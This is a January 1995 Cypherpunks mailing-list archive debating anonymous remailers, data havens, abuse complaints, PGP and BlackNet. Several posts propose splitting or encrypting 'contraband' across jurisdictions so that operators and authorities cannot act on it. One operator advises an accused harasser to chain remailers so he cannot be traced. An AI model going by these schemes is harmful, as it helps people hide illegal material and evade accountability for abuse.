SIGNED MESSAGE----- I'm using MacPGP 2.6(ui) and noticed that the limit for a key size is the 1048 bit ("military grade" (right)). Is there anyway to circumvent this to make larger, harder-to-break-type keys? TIA, - -J -----BEGIN PGP SIGNATURE----- Version: 2.6ui iQCVAgUBLxr4xEiLvmPjc4XdAQFVZgP/UsykAUkO18IFddV+QTOkEK4wwipljb/F U1zkrh3IlUUHg82OVhS7tAtEn68d2NyNvbv5k+00CY+DYv9eSLgSbgTeMyyspFTf ZmQtjQZu0Qe6NVWOVMXAFzfUDhmAAytfssvMHqSEMyxaHdyNNFoK9csSg39VchfF s/VBsHv9sZ4= =JQbl -----END PGP SIGNATURE----- (-: aka: :-) (-: Jaeson M. Engle || jme at josaiah.sewanee.edu :-) (-: www server: http://josaiah.sewanee.edu/ :-) (-: It's January 29th! IT'S TIME!!! Ask me for details!:-) (-: Finger 'jme at josaiah.sewanee.edu' for my Public :-) (-: PGP block. :-) From bdolan at use.usit.net Mon Jan 16 15:03:29 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Mon, 16 Jan 95 15:03:29 PST Subject: Another internet story: INFO: NBC Nightly News Tonight (fwd) Message-ID: ---------- Forwarded message ---------- Date: Mon, 16 Jan 1995 16:44:07 -0500 From: Craig Peterson To: Multiple recipients of list Subject: INFO: NBC Nightly News Tonight A story regarding the Internet, with some sort of mention of NRA.org, should be on the NBC Nightly News with Tom Brokaw tonight. Craig. From unicorn at access.digex.net Mon Jan 16 15:06:59 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Mon, 16 Jan 95 15:06:59 PST Subject: Another problem w/Data Havens... In-Reply-To: <9501150445.AA13977@toad.com> Message-ID: On Sat, 14 Jan 1995, Robert Rothenberg wrote: > Date: Sat, 14 Jan 1995 23:45:41 -0500 (EST) > From: Robert Rothenberg > To: cypherpunks at toad.com > Subject: Another problem w/Data Havens... > > > I can see a potential problem with Data Havens (as they've been discussed > here) that may very well inspire the wrath of the authorities more than > nuclear secrets or dirty pictures of J.Edgar Hoover... > > How does one keep a site from becomming a remote pirated-software exchange > site? (Esp. since after that MIT case laws may be changed...) It seems that > such a service could become a magnet for the "elite warez" crowd... and even > if the operator isn't jailed it could lead to a shutdown of the service. > Properly formatted, a dispersed multijurisdictional data haven can effectively say "Who cares" to the entirety of your point. A data haven that mandates encryption for all incoming data will be essentially immune from this sort of problem. The real measure of shutdown will be (on non-privately owned sites) the level of traffic that begins to interefere with other functions of the site. Data havens that can split data to two or more locations in seperate jurisdictions can effectively ignore attention from authorities not related to the site management or site preformance. Encryption mandated sites can also take this stance, while encryption is legal in any event. -uni- (Dark) -- 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From jrochkin at cs.oberlin.edu Mon Jan 16 16:09:41 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Mon, 16 Jan 95 16:09:41 PST Subject: Announce: ChainMail 0.6b applescript for using anon remailers Message-ID: I've written an applescript for using the cypherpunks-style anon remailers with Eudora for the macintosh. It will take a message in Eudora, and construct a chain with MacPGP for encryption, through remailers you've specified, and then deposit it back in Eudora for sending. There are still several features I'd like to add to it, but it's quite useable in it's present incarnation. You need a scriptable version of MacPGP, scriptable version of Eudora, and some sundry scripting additions which are listed (with URLs) in the docs. Send email if you'd like a copy, and I'll mail you a binhex'd copy. I don't want it on any archive sites yet, because it's not really done, or fully beta tested for bugs. (so let that be a warning to you, too.) From grendel at netaxs.com Mon Jan 16 16:48:08 1995 From: grendel at netaxs.com (Michael Handler) Date: Mon, 16 Jan 95 16:48:08 PST Subject: request for factorising code In-Reply-To: <6482.9501161922@exe.dcs.exeter.ac.uk> Message-ID: On Mon, 16 Jan 1995 aba at atlas.ex.ac.uk wrote: > I have code to generate the RSA key pairs and modulus, what I am > looking for is code to factorise a number using one of the better > algorithms (quadratic sieve, etc.). It's been established that the encryption in Netscape is 40 bit RC4, not 40 bit RSA, but if anyone's still looking for the quadratic sieve code, look on Derek Atkins' ftp site toxicwaste.mit.edu. Arjen Lenstra may have made the large number field sieve (LNFS) code available somewhere, but I'm not sure. -- Michael Handler Civil Liberty Through Complex Mathematics Philadelphia, PA PGP Key ID FC031321 Print: 9B DB 9A B0 1B 0D 56 DA 61 6A 57 AD B2 4C 7B AF "Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme From homer at math.cornell.edu Mon Jan 16 17:27:38 1995 From: homer at math.cornell.edu (Homer Wilson Smith) Date: Mon, 16 Jan 95 17:27:38 PST Subject: Abuse Complaint out of homer@rahul.net Message-ID: Oh, Goody. I get to deal with my first abuse complaint for my remailer. Seems to me that letting others decide what is or is not abuse without at least being able to see the abuse myself would be wrong, that opens the door to just anyone claiming they were abused and my taking action against the alleged abuser. Clearly though if some admin of a system considers something an abuse, one can not just blow them off, we are all responsible for responsible use of the net. Even if this posting came through a chain, this admin is going to try to trace back the chain through the other remailers. So if I give him the remailer it came from, he is going to pester that remailer operator who won't appreciate it. I will soon be able to install blocking on the To: or From: lines. Blocking the From lines is hard, because usually abuse comes through other remailers, so I can't just block that. I can however block To: lines if the person is abusing one particular usenet newsgroup or end receiver. It would seem that if I am going to take action against someone with blocking of some sort, then I have at least a right to see the full posting that is claimed to be abusive. By the way, rahul.net keeps syslog files world readable which I find to be a security leak, as anyone (specifically the Church of Scientology) could find out who is in communication with me and start to harrass them too. Comments on ethics and diplomatic handling of this would be appreciated. Homer From jya at pipeline.com Mon Jan 16 18:17:57 1995 From: jya at pipeline.com (John Young) Date: Mon, 16 Jan 95 18:17:57 PST Subject: Economist on EFF Message-ID: <199501170217.VAA29809@pipe1.pipeline.com> The Economist of January 14-20 washes EFF's dirty laundry. After recounting Berman's boot and EFF droop, the article concludes: "That leaves cyberspace's radical libertarians without a voice in Washington. They're probably delighted." From homer at math.cornell.edu Mon Jan 16 18:22:11 1995 From: homer at math.cornell.edu (Homer Wilson Smith) Date: Mon, 16 Jan 95 18:22:11 PST Subject: Abuse and Remailer Ethics Message-ID: I am surprised there isn't a widely agreed upon codification of remailer operator ethics for handling abuse cases. Perhaps there is, and I would appreciate someone pointing me to it. I am not presently on cypherpunks, so please include me in the replies. Here is the situation. homer at rahul.net runs with header logging on, it contains, From: To:, Date: and Subject. rahul.net also keeps syslog files for a week, and makes them public to those on rahul.net. B writes me saying he is the 'admin of a listserv' and complains that someone is abusing his list with postings through my remailer. He wants the name and e-mail of the abuser to 'talk to him personally'. Clearly I should not give out the name of a remailer user (if I know it) unless ordered to by a court order. Thus his request is, on the surface of it, absurd. In this case the alleged abuser, A, did not chain his posting so my logs clearly show who it is. Clearly I am always going to know the To: of an abuse because the complaint comes to me from or about that address. If the abuser only uses one remailer, then I am clearly going to know the From: line also, as it is right there in the header logs or rahul.net syslog files (same thing.) If the abuser chains and a complaint comes to me, all I will know about the From: line is that it came from another remailer. However now that I know his name and e-mail, if I get another complaint about him, and he has wised up and started chaining, I could pass his name onto the prior remailer before mine, and that remailer could do the same, until it came back to the first remailer on the chain who could take action. This however would piss off a lot of remailer operators. But now what action is appropriate? Well giving A's name to B is out of the question without a court order, right? Blocking the To: line, namely the abused party, is extreme as that blocks others from posting to that list or group, unless the list or the group wishes to have no anon messages. In which case I probably might consider blocking the end recipient. Blocking the From: line, will stop all further postings from that person, which is fitting if indeed he is 'abusing' people, but he will merely start posting through other remailers, who will then have to go through the same procedure. Perhaps there is some justification then for remailer operators sharing blocked From: lines with each other, that might be a good idea. But who is to decide what is or is not abuse? Surely I can't let others tell me that they have been abused without even reading the message, I have seen it happen all to often that parties claim they are being abused when they are merely being exposed and rightly so. On the other hand, since I am responsible for my own little corner of the net, if something happens that I consider abuse, I certainly have a right to put an end to it if I can. Some questions: Does any single recipient have the right to demand that they be blocked from all anon messages. I would say yes. How about demanding blocking anon messages only from some senders? That is harder to implement. If you block the sender, you block ALL his postings, not just to that party. So you would need to block specific From: and To: combinations. This would not work with chaining at all, even if we did share blocking information. So that is out. Does a list owner have the right to demand blocking to his list, with or without a vote of the list readers? I would say yes. What about a newsgroup? I would say it takes a vote. Are anon voites allowed? Touchy question that was important at one time on alt.r.scientology. Anyhow I would guess that the correct action here is to write the offender and let him know a complaint has been registered against him. I would also educate him as to why he was so easily traced and tell him that if he wants to avoid such in the future to start chaining. However if he is a determined abuser not prone to social embarassment, then the sharing of blocking among remailer operators might become a very good idea. I don't know how you seasoned reops feel about abuse, jpunix went out of business for want of an effective way to deal with it. I think part of the answer is in close cooperation. This might help keep the abuse down, and raise the reputation of reops so that people begin to think of us as responsible service providers rather than anarcho terrorists. However I am very new to this field, so I may have my head stuck up my ass, and I would like to hear back from you on your ideas. Homer Wilson Smith homer at rahul.net From jcorgan at scruznet.com Mon Jan 16 18:23:31 1995 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Mon, 16 Jan 95 18:23:31 PST Subject: Another problem w/Data Havens... Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >Data havens that can split data to two or more locations in seperate >jurisdictions can effectively ignore attention from authorities not >related to the site management or site preformance. Encryption mandated >sites can also take this stance, while encryption is legal in any event. It just occurred to me when reading this another method for ensuring the "I can't tell what's in it" condition with a data haven operator. Why not use a secret sharing system where the contraband data is split into a number of pieces and sent to different havens? It could be argued that the individual pieces are not the same as the whole, and there is absolutely no way the operator could recover the original from a given piece (thus providing plausible deniability.) Using M by N secret sharing, with M < N, you build in some redundancy in case one of the havens gets shutdown. Ok, Eric, go ahead and blast your holes in this argument :) == Johnathan Corgan "Violence is the last refuge of the incompetent." jcorgan at scruznet.com -Isaac Asimov -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxspxk1Diok8GKihAQG4FAQAjCaFOGC+N5zjQ3zVQstv75wxBp/d0js1 2a3ecWdD/S3Sv70l9Y2N4e4vja8Pps4eR1a7Gtzq/nWcHmZXRGRgCzaaHGCNibF5 RaIJUlGGpaKe/UaQ3XfZH2guRBSUCIi4To7QWf3CzpZoWkR4gmZhhB1AcZrd6Z34 WYqZUBwuISI= =68Mc -----END PGP SIGNATURE----- From jrochkin at cs.oberlin.edu Mon Jan 16 19:25:58 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Mon, 16 Jan 95 19:25:58 PST Subject: Abuse and Remailer Ethics Message-ID: At 9:21 PM 01/16/95, Homer Wilson Smith wrote: [snip] > Does any single recipient have the right to demand that they be >blocked from all anon messages. I would say yes. > > How about demanding blocking anon messages only from some >senders? That is harder to implement. If you block the sender, you >block ALL his postings, not just to that party. So you would need to >block specific From: and To: combinations. This would not work with >chaining at all, even if we did share blocking information. So that >is out. > > Does a list owner have the right to demand blocking to his list, >with or without a vote of the list readers? I would say yes. > > What about a newsgroup? I would say it takes a vote. Are anon voites >allowed? Touchy question that was important at one time on >alt.r.scientology. I agree with all of that. Somewhat conditionally with what you say about newsgroups, because while it sounds nice, it would be hard to implement. I'm tempted to say that a newsgroup, by it's nature, doesn't have any mechanism for control/government, once created. And as such, doesn't have any way to "decide" not to accept anonymous posts, or posts from a specific user or remailer. So I'm tempted to say "tough luck" to newsgroups that don't like receiving anonymous posts. The alternative is for people interested to create a moderated newsgroup, where of course the moderator could refuse to allow anonymosu posts with or without the remailer operators cooperation. > Anyhow I would guess that the correct action here is to write the >offender and let him know a complaint has been registered against him. >I would also educate him as to why he was so easily traced and tell >him that if he wants to avoid such in the future to start chaining. Yes, I think that is an excellent course of action. > However if he is a determined abuser not prone to social >embarassment, then the sharing of blocking among remailer operators >might become a very good idea. I'm not so sure about that. It might become neccesary, but blocking remailer delivery to a particular address is a _much_ more desirable solution, in my opinion. If a particular person doesn't want to receive anonymous mail, fine. And it might be good to have a mechanism by which he could make those desires known to all remailers, so he doesn't have to do it individually. But if he does want to receive mail from the remailers, I think he's got to receive all mail from the remailers, and not count on the remailer operators to play Identity Detective and try to screen out people he doesn't like. Same with a listserv and the requests of the listserv operator. A newsgroup is, of course, more touchy, because there really _isn't_ a way for "the newsgroup" to decide not to accept anonymous posts. And I'm not really sure there should be. Part of the answer relies on how "independent" your remailer is. If you _were_ to take no action at all to people who complain about "abuse", would you get in trouble? (from school, company, service provider, country). If you would, then you've got to decide if you are willing to take the heat. And your probably not willing to take the heat for Cantor & Siegel to spam the net. So you've got to do what you've got to do. But, personally, if I ran a remailer on a machine that wasn't subject to political pressure (from school, service provider, whatever), I would never make any effort to cooperate with other operators to track down "offenders", and I'd never exclude any newsgroups from delivery. Because I wouldn't want to play censor and decide what "offense" is worth tracking down, and what isn't. And because even having the _capability_ to track down people is really dangerous, when you get pressure to track down someone you _don't_ want to track down. Much better to say "Can't be done, don't have logs, can't figure out who it was," then to have to admit "well, I've tracked down 5 people in the past month cause someone complained about them." Kind of ruins the point of anon remailers. Best would be to have tracking down be impossible, and it would be close to, if not entirely, impossible if the user took the proper precauations. But even if it's possible, it's probably best not to develop a mechanism to do it. From grendel at netaxs.com Mon Jan 16 19:43:46 1995 From: grendel at netaxs.com (Michael Handler) Date: Mon, 16 Jan 95 19:43:46 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: On Mon, 16 Jan 1995, Johnathan Corgan wrote: > It just occurred to me when reading this another method for ensuring the > "I can't tell what's in it" condition with a data haven operator. Why not > use a secret sharing system where the contraband data is split into a number > of pieces and sent to different havens? Damn it, you beat me to it. :-) [ ... ] > Ok, Eric, go ahead and blast your holes in this argument :) I'm not Eric, but hey. This entire discussion is completely unnecessary. There are ways of removing operator liability without examining the submission at all. ---------- unix3.netaxs.com:/home/grendel 1/511> host bermuda-gw.alter.net bermuda-gw.alter.net has address 137.39.234.130 bermuda-gw.alter.net mail is handled by relay2.UU.NET bermuda-gw.alter.net mail is handled by relay1.UU.NET unix3.netaxs.com:/home/grendel 1/512> ---------- Nicht wahr? Michael From mclow at coyote.csusm.edu Mon Jan 16 19:46:38 1995 From: mclow at coyote.csusm.edu (Marshall Clow) Date: Mon, 16 Jan 95 19:46:38 PST Subject: Another internet story: INFO: NBC Nightly News Tonight (fwd) Message-ID: >A story regarding the Internet, with some sort of mention of NRA.org, >should be on the NBC Nightly News with Tom Brokaw tonight. > It did not play out here on the left bank, probably because of the earthquake in Japan. Maybe tomorrow. -- Marshall From hroller at metronet.com Mon Jan 16 19:53:27 1995 From: hroller at metronet.com (Michael L. Acklin) Date: Mon, 16 Jan 95 19:53:27 PST Subject: Abuse Complaint out of homer@rahul.net In-Reply-To: Message-ID: <0hp6lS$TgAh4077yn@metronet.com> Homer, I am going to have to agree with you on this. A Sysadmin would have to see the messages or data that is suppose be harassing the complaintant. What I say is harassment may be different from what you say it is. Michael L. Acklin ------------>hroller at metronet.com Finger for Pub Key or MIT Key Server PGP Fingerprint: 86 D6 52 87 E4 FD 64 05 63 BA CA AA B8 A9 04 From homer at math.cornell.edu Mon Jan 16 20:12:21 1995 From: homer at math.cornell.edu (Homer Wilson Smith) Date: Mon, 16 Jan 95 20:12:21 PST Subject: Abuse and Remailer Ethics In-Reply-To: Message-ID: OK, I understood all this. I am afraid that if we implement a total no tracing scenario, then remailers will come under heat from the world at large and the governments. Maybe not. Rright now, Rahul (a good guy) is implementing syslogs whether I want him to or not, and that isn't about to change. Really I would have to be the owner of my own system in order to do what you are suggesting. But then that is what got jpunix shut down. No way to deal with complaints, and big time abuses going through his server, right JP? But I see the advantage to total no tracing, I am just not sure all of us are really strong enough yet to implement it and stay in business. Homer From homer at math.cornell.edu Mon Jan 16 20:36:44 1995 From: homer at math.cornell.edu (Homer Wilson Smith) Date: Mon, 16 Jan 95 20:36:44 PST Subject: Remailer Abuse (fwd) Message-ID: Here is the message I sent to both the complainant and the complainee. Homer Dear ..... , I have been contacted by someone complaining about a posting you made through my remailer. They want me to tell them who you are, which ain't going to happen, but at the same time I don't like getting complaints, you understand? Of course I can not tell you who complained any more than I can tell them who you are. But you know where you have been posting using my remailer, right? Now I have no idea if what you posted was really abusive or not, I did not see the posting or postings, and I know a lot of people complain about 'abuse' when really its just their closed minds being opened up. I was able to 'trace' you because you sent something through my remailer without using chaining. If you had chained I would never know who the posting came from. I was told who it went too and the time, and its right there in my system's syslogs coming from you. If you chain and use PGP, then I could not have traced you. So read the instructions on chaining and make sure you USE it. You will be a lot safer in the future from complaint attempts than if you don't use chaining. If you have questions on how to chain, ask on alt.privacy.anon-server or read the various helps at many of the remailers. I have reposted this letter to alt.privacy.anon-server without your name and sent a copy to the complainant. I expect not to hear anything more about you, ok? Homer Wilson Smith System Adminstrator of Remailer at homer at rahul.net From marko at millcomm.com Mon Jan 16 21:40:34 1995 From: marko at millcomm.com (Mark Oeltjenbruns) Date: Mon, 16 Jan 95 21:40:34 PST Subject: Does encrypted equal safe? Message-ID: > At 10:08 PM 1/11/95 -0800, Eric Hughes wrote: Edited from response on the 'How do I know if its encrypted?' thread to get some points in the clear. >If you can't read it, it's not kiddie-porn *for you*, although it >might be for someone with the key. > So the fact that its not kiddie-porn *for me* makes it safe *for me* to be transporting or storing for others that know it is kiddie-porn? >Encryption fragments meaning subjectively. A magazine, for example, >has a fixed center of meaning for all who can read the language. A >magazine looks the same to all who look at it. An encrypted file >looks different to those who have the key from those who do not. > But why does the meaning of the data assume to change? If I take my stack of kiddie-porn and put it in a box with a big strong lock on it, in a way physically encrypting it, change the meaning of what I have? I now have a locked box that looks different from my original. >Encrypted data is fundamentally different from paper-and-ink data in >this way. The metaphor of "planting it on somebody" does not apply to >data that the "somebody" can't read. It is fundamentally a different process, but does that make it different from the locking the physical data in a box as above? > >[...] If you can't easily read it, you >can't be expected to have read it. The operator of a data service has >_zero_ motivation to cryptanalyze something. If they happen to apply >a viewer to the file (for whatever reason), they don't _want_ to see >what's inside. > It seems to me that what you are saying is that because the data is in a form that I can't understand, I'm safe from trouble. Now it seems to me that this is not all that different from changing the form or appearence of physical data and saying I'm not responsible for it. Now think of a remailer: If somebody gave me this box of stuff, stuff that I had no idea of what it was since it was *locked up*, to transport over to location X and I got busted half way there am I safe? Would the argument that I didn't know what it was hold up? I would tend to say no. If the answer was yes, which is what some current arrguments seem to indicate, what does that say about responsibility towards spamming or remailing illegal data? Can I say that even though someone is using me to spam or distribute kiddie porn, I have no reason to try and stop it since I don't know what they are doing? If I did take it upon myself to stop the abuse wouldn't I need to analyize the incomming data to stop it? Something I'm not supposed to do. A Data Haven: It is illegal to handle certain items in the physical world. I can get in some trouble if I have kiddie porn or drugs or what not in my possesion. This is true, for most things I would guess, even if I was just 'holding it for someone else.' After all, how do I prove that somebody else put illegal articles, encrypted or not, on my 'site' and it didn't atually come from me? Does 'holding it for someone else' type arguments work in net.world better than in the physical world? Once again, current arguments would say yes, it is different and I'm safe to hold onto illegal data since I don't know what it is. Lets see if I got this straight. In my own words, I'm just as responsible for the data I massage as the person I'm doing it for judging by real world parellels, encrypted or not. Now I would hope this is not the case, since being a remailer operator would mean that if somebody starts a spam using my site I would be just as responsible as the person that started it. Having kiddie porn on my DH would be illegal even if I had no idea it was present. This doesn't sound to good, since many of the uses of my services would be restricted if I wanted to stay 'safe.' After all if I wasn't as responsible for the spam and was safe from harm, or guilt, about what people used my site for I wouldn't care what went through my system, I'm not really supposed to care what people send me right? In fact I may even take pride that my system is being used so much. ;-) But this doesn't seem to be the case, nor in some regards would I hope them to be. Now I'm getting confused. There seems to be some contradictions in some of the above that need to be worked out, or at least explained to me. Some pretty serious legal problems seem to be lurking with in. It just doesn't seem as cut and dry to me as the argument that if I don't know what it is I don't have to worry about it. I'm sure others will have some comments to help me sort this out. -Mark ---------- Mark Oeltjenbruns marko at Millcomm.com N0CCQ SnipIt Research Finger for PGP key. From nesta at nesta.pr.mcs.net Mon Jan 16 22:23:57 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Mon, 16 Jan 95 22:23:57 PST Subject: Jude Milhon in WIRED In-Reply-To: <9501160118.AA05350@snark.imsi.com> Message-ID: On Sun, 15 Jan 1995, Perry E. Metzger wrote: > > rishab at dxm.ernet.in says: > > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter > > member of the cypherpunks - a term that she coined." I didn't even know there > > _was_ a charter. > > Or a Jude Milhon, for that matter. Another example of the continuing > decay of a once proud magazine... > Uhm, this is funny 8) Jude is the patron saint of a losing battle, the one to keep the Internet free, and to fuck with media as much as possible when it brings fun. And the gravy whick dominatrix, all rolled into a few. she's also a freind so watch it punk 8) From wcs at anchor.ho.att.com Mon Jan 16 23:37:38 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Mon, 16 Jan 95 23:37:38 PST Subject: Abuse Complaint out of homer@rahul.net Message-ID: <9501170734.AA09389@anchor.ho.att.com> Michael wrote, to Homer and the lists > I am going to have to agree with you on this. > A Sysadmin would have to see the messages or data that is > supposed to be harassing the complainant. What I say is harassment > may be different from what you say it is. There's different levels of harassment. For the kind that says 1) "Don't send me any of this junk mail any more", if the recipient wants to define junk mail to the remailer-operator, there's no ethical problem if the operator wants to block remailed mail to the recipient, though it's good form in non-remailer-chain environments for the operator to issue a bouncegram if possible. If the recipient has to pay per byte/message to receive mail, or the amount transmitted is really excessive, then this is certainly something an operator ought to do to avoid problems. (It's potentially bad form for a for-profit operator to cash digicash postage for delivering the messages if he doesn't, at least without a warning in his pricing policy advertisment.) If the operator doesn't want to block remail to an unwilling recipient, the ethical and legal questions become more interesting. The question of whether the "don't bug me" list gets published is also interesting. For the kind of harassment complaint that says 2) "Block all remail to me from this destination", there are implementation issues - can the remailer perform checks like this before doing the header-munging? Is there more security risk? Of course, with chaining, it's a lot less useful. For the kind of complaint that says 3) "Block all remail to this group of people", there's the question of whether the requester is authorized to request that for the entire group - newsgroups are an especially interesting problem. Julf's remailer blocks posting to some newsgroups, because the readers have done the usual net.poll and decided they'd like him to block it, since lots of the remail was spam. But especially with newsgroups, it's easy for the recipient to trash incoming articles from the remailers. Bill From wcs at anchor.ho.att.com Mon Jan 16 23:44:56 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Mon, 16 Jan 95 23:44:56 PST Subject: Abuse and Remailer Ethics Message-ID: <9501170741.AA09451@anchor.ho.att.com> > OK, I understood all this. I am afraid that if we implement a total > no tracing scenario, then remailers will come under heat from the world at > large and the governments. Maybe not. Rright now, Rahul (a good guy) is > implementing syslogs whether I want him to or not, and that isn't about to > change. Really I would have to be the owner of my own system in order to > do what you are suggesting. You can do a good job of anonymous remailing even on a system that keeps email logs, if the system is otherwise trustable. When mail comes in to your remailer, store it in a file (encrypted....). Periodically take the files of stored messages, shuffle them, and mail them out. It's about the same behavior as doing the same from your own box with eavesdroppers on your network, though the traffic levels are a bit different if each remailer operator on rahul.net gets identified separately instead of all the remailers getting lumped together. But if there are multiple remailers on Rahul's machine, and if the syslogs don't log internal mail, you could also forward some of the remailer traffic randomly through other remailer-operators there. Bill From craig at passport.ca Tue Jan 17 00:09:21 1995 From: craig at passport.ca (Craig Hubley) Date: Tue, 17 Jan 95 00:09:21 PST Subject: FBI and BLACKNET In-Reply-To: Message-ID: > On Wed, 11 Jan 1995, Samuel Kaplin wrote (about FBI interest in BlackNet) > > > I hope they took you someplace nice for lunch...You might want to file a > > FOI request on yourself, just to see how much they censor. ;) They might > > think you're the ringleader, after all the FBI doesn't buy peons lunch. ;) > > For the benifit of myself and the list, how would you go about doing that? Also would be useful to know the equivalent procedures for Canada, UK, etc. Filing such a request would probably get a file opened on you, too, but so what? The more these files fill up with innocent people the more useless they get. Perhaps everyone ought to sign up their granny to receive the Loompanics catalog or 2600, as a way to generate noise. Regarding BlackNet, I am not sure that they are not *run* by the FBI, or NSA, or CIA, MI6, Interpol, or some more mysterious quasi-governmental entity. Such agencies must realize that traffic in secrets is possible, inevitable, and would probably love to put themselves first in line to buy. Think of the value: embarrass rival agencies, identify leaks (if not sources), raise funds for clandestine operations through resale or blackmail, etc. Security agencies have often engaged in smuggling as a form of entrapment, and/or fundraising; Consider Iran-Contra as a recent high-level example. The mandate to trap offenders in a 'sting' also provides a handy alibi to excuse such operations if they are ever exposed. Citizens have no such protections. Even a record of successful dealings with BlackNet would mean little. If it were run by, say, the Nuclear Non-Proliferation Commission, then presumably it would purchase non-nuclear secrets at high prices to build up credibility. When a nuclear secret was offered for sale it would spare no expense to find the source. In fact the 'highest bidder' for a secret would often be the embarrassed/enraged agency responsible for preventing its leak. At the very least such agencies could be expected to deal secretly with the BlackNets... why search out a secret yourself if you can buy it on the 'open' market? Craig Hubley Business that runs on knowledge Craig Hubley & Associates needs software that runs on the Web craig at passport.ca 416-778-6136 416-778-1965 FAX From danisch at ira.uka.de Tue Jan 17 00:24:16 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Tue, 17 Jan 95 00:24:16 PST Subject: Scientologys Attempts Message-ID: <9501161644.AA06046@elysion.iaks.ira.uka.de> I just had a view into the alt.religion.scientology and alt.clearing.technology newsgroups. There are some messages about a Scientology decision to shut down every internet traffic about Scientology. If the messages are true, Scientology sent rmgroup Control messages to remove the groups. The request to stop the remailers seems to come from the same people... Hadmut From wcs at anchor.ho.att.com Tue Jan 17 00:32:34 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Tue, 17 Jan 95 00:32:34 PST Subject: Another problem w/Data Havens... Message-ID: <9501170829.AA10034@anchor.ho.att.com> Michael wrote: > This entire discussion is completely unnecessary. There are ways > of removing operator liability without examining the submission at all. Liability is a legal issue, not a technical one. (Catchability is a technical issue.) The basic ways to remove liability are to either run your system where the local laws don't object to information storage, or to reduce the operator's involvement to levels that the local legal system will tolerate. The former case is easy, if you can rent computer space in a country with a non-meddling government and good net access (or an easily rentable government :-).) For those of us in the latter situation, the discussion's still useful... On Mon, 16 Jan 1995, Johnathan Corgan wrote: > > It just occurred to me when reading this another method for ensuring > > the "I can't tell what's in it" condition with a data haven operator. > > Why not use a secret sharing system where the contraband data is > > split into a number of pieces and sent to different havens? Good, but still has most of the same old risks. Alice asks Dave's Data Haven to store stuff, and later retrieves it. Dave doesn't want to be able to know what's in it. There are three main threat periods - at receipt of the data, during storage, and at retrieval. Secret sharing is great for the storage period, assuming the data havens are in different jurisdictions and the cops can't force the operator (Dave) to go retrieve all the pieces. However, at receipt of the data, it's all in one place, Dave's inbox. If Alice encrypted it safely, or secret-shared it herself, great! But if Alice is a narc trying to entrap Dave with plaintext ThoughtCrime, or Alice's key has been compromised, anything in Dave's inbox is still toast, even if anything that's been split and stored is safer than if it had been stored unsplit. So he either needs to split it fast, shortening the window, or find a way to blind his mail before processing it, or split it before reading it. Splitting before reading isn't impossible in a stream environment. Define a protocol that looks like SMTP, but opens up three outgoing streams as well as an incoming stream, and uses standard mail formats. While reading the headers from Alice (either the real contents or just the handshakes at the beginning), Dave's receiver thinks about them and sends some meaningful headers to Moe, Larry, and Curly. Once the message body starts, instead of storing the incoming bytes, Dave sends every other byte to Moe or Larry, and the xors to Curly.* If he wants to get fancy, he can even encrypt the data with a stream cypher as he goes along, giving half the key to each of them. That way, Dave's system really only has knowledge of the headers, plus one line at a time of incriminating data on the fly. And his partners can't give anything away either; they're just stooges. * If the connections to and storage by Moe and Larry are reliable enough, Curly doesn't really need to be involved, but the xor business lets you reconstruct everything from just two parts. Bill "Privacy is not a crime!" From erc at s116.slcslip.indirect.com Tue Jan 17 00:53:03 1995 From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin]) Date: Tue, 17 Jan 95 00:53:03 PST Subject: Jude Milhon in WIRED In-Reply-To: <199501161819.KAA14478@netcom19.netcom.com> Message-ID: > Anyway, many of the folks "Wired" and the other hype-zines interview > are indeed strange and marginal. To be expected. There are only so > many of the standard "talking heads" that can be interviewed (the > stand-bys like Engelbart, Nelson, Toffler, Pournelle, etc.). > > Frankly, I'd rather see a story on "Zippies," about which I'd heard > nothing substantive before, than Yet Another Ted Nelson Story, about > which I've heard entirely too much over the past decade. (Not to > insult Ted--Hi, Ted!--but there are only so many ways to tell the > Xanadu story...time for new approaches.) > > I know some folks in the crypto/PGP community who were quite miffed > that such "marginal" folks as Eric Hughes, John Gilmore, and I were > featured on the cover of "Wired" 1.2 two years ago...they naturally > saw themselves as being more worthy, as perhaps they were....such is > life. The "credit assignment problem" in evolution and genetic > programming remains a tough one. I'm not sure that that's the case. Just because you move in dramatically politically incorrect circles (no insult intended) you may tend to get interviewed more than, say, I would. The fact that I might be working on more important or interesting things is completely irrelevent. Cypherpunks is 'hot', so the press goes to who are perceived to be the 'movers and shakers' and they are talked to. The people working behind the scenes on stuff often are ignored in deference to those who are more visible. Again, no insult intended, but I think there's a large measure of truth in it. The same people keep getting the press while the larger bulk of the population gets ignored. It's also geographically-oriented, too - the folks on the West Coast tend to get the majority of the press, followed by the East Coast. Anyone in between is basically ignored. I guess the press thinks that no one outside of Silicon Valley or Boston is working on anything of any substance. Hell, look at Linux - that was done by a guy in Finland, and a college student at that. I'll bet that's rather embarassing to the "hot shots" in Cupertino :) -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi ** PGP encrypted email preferred! ** Cop: "How many beers have you had tonight, bro?" Suspect: "Seventy." -- from the TV show "Cops" From asgaard at sos.sll.se Tue Jan 17 02:06:23 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Tue, 17 Jan 95 02:06:23 PST Subject: Abuse and Remailer Ethics In-Reply-To: Message-ID: This thread illustrates (at least if setup's like this are worthy of a place in Raph's list) that penet.fi is the safest way to go for the moment. I would just hate it to have my head on the plate of a remailer operator who takes an interest in subtile ethical 